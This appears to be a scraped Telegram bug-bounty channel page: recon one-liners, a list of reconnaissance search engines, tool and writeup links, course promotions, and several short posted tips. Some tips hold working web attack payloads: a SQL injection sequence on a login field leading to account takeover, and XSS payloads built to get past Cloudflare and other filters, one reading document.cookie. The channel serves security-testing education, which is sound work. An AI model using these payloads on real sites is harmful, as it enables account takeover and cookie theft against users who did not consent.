en
Feedback
Bug Bounty

Bug Bounty

Open in Telegram

Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •

Show more
9 446
Subscribers
No data24 hours
-37 days
-6030 days
Posts Archive
🚨 XSS Hunting from WaybackURLS 🔍 waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed
+1
🚨 XSS Hunting from WaybackURLS 🔍 waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss credit : gudetama_bf #bugbountytips #bugbounty

🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨 📢Subdominator is a powerful tool for passive subdomain enumera
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨 📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources. 🔗Link- https://github.com/RevoltSecurities/Subdominator

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc gr
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips

🔍 Search Engines for Bug hunter & Security Pro : [ Recon is the key ] 1. http://google.com - Dorks 2. http://shodan.io - Ser
🔍 Search Engines for Bug hunter & Security Pro : [ Recon is the key ] 1. http://google.com - Dorks 2. http://shodan.io - Servers 3. http://censys.io - Servers 4. http://hunter.io - Mail addresses 5. http://fullhunt.io - Attack Surface 6. http://onyphe.io - Servers 7. http://socradar.io - Threat Intelligence 8. http://binaryedge.io - Attack Surface 9. http://intelx.io - OSINT 10. http://crt.sh - Certificate search 11. http://vulners.com - Vulnerabilities 12. http://securitytrails.com - Servers #CyberSecurity #InfoSec

SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200
SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 2. Final Query: 8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') -- 2024-04-03 21:20:55 >> Exact time and date 1 >> attempts you can see the 200 response last you can login with the 1110 OTP and get access to the victim account :) Credit- Kullai

Hackerone got hacked! How can I steal your POC? 🥷🏻 • Weakness - Sensitive Information Disclosure • Bounty - $15,000 • CC -
Hackerone got hacked! How can I steal your POC? 🥷🏻 • Weakness - Sensitive Information Disclosure • Bounty - $15,000 • CC - Hasyim Critical bugs directly upstream (Hackerone) as a bug bounty platform : https://kresec.medium.com/hackerone-got-hacked-how-can-i-steal-your-poc-01a9132c5aeb

💾 File Upload Vulnerability 💻 Learn how to secure your website against file upload vulnerabilities, a common target for attackers seeking to compromise your system. 🔒 Check out our latest blog post for tips on securing file uploads: https://vulncure.com/blog/tips-to-secure-file-upload/

(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/> Tips: Always play with input's =>
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare. #bugbountytip #bugbounty

Unlock a 20% discount on our Pentest Pro course! Hurry, offer ends April 25th. Use code: CGT-20-OFF.

Get 20% off our PentestPro course! Offer ends April 25th. Use code: CGT-20-OFF.

HackLearners brocher.pdf26.16 MB

Hey everyone! 👋 Exciting news: tonight at 9:00 PM, we're hosting a voice chat on our Telegram channel with Neeraj Chandra, C
Hey everyone! 👋 Exciting news: tonight at 9:00 PM, we're hosting a voice chat on our Telegram channel with Neeraj Chandra, CEO of HackLearners. He'll be talking about how to grow your career in cybersecurity. It's a great chance to learn from the best in the field. Don't miss out!

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

🌟 Exciting Opportunity Alert! 🌟 We're excited to announce that three students will have the chance to win a free pentesting
🌟 Exciting Opportunity Alert! 🌟 We're excited to announce that three students will have the chance to win a free pentesting course! To enter🚪, simply comment why you're eager to learn pentesting and retweet this post. Good luck! 🎉 #hacklearners https://x.com/_HackLearners/status/1780800923901509786

Bypasses for the most popular WAFs.pdf1.11 MB

🗃️File Upload Cheatsheet ⚡
🗃️File Upload Cheatsheet ⚡

photo content